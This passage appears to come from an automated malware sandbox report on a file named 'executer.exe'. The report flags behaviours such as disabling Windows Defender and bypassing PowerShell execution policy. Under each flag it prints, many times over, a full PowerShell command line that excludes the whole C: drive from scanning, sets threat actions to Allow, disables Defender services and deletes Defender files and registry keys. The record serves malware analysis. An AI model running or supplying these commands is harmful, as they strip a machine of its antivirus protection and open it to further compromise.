DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Adds extensions / path to Windows Defender exclusion list
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Bypasses PowerShell execution policy
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ep bypass .\test.ps1;
          Disables Windows Defender (via service or powershell)
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Modifies Windows Defender protection settings
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path 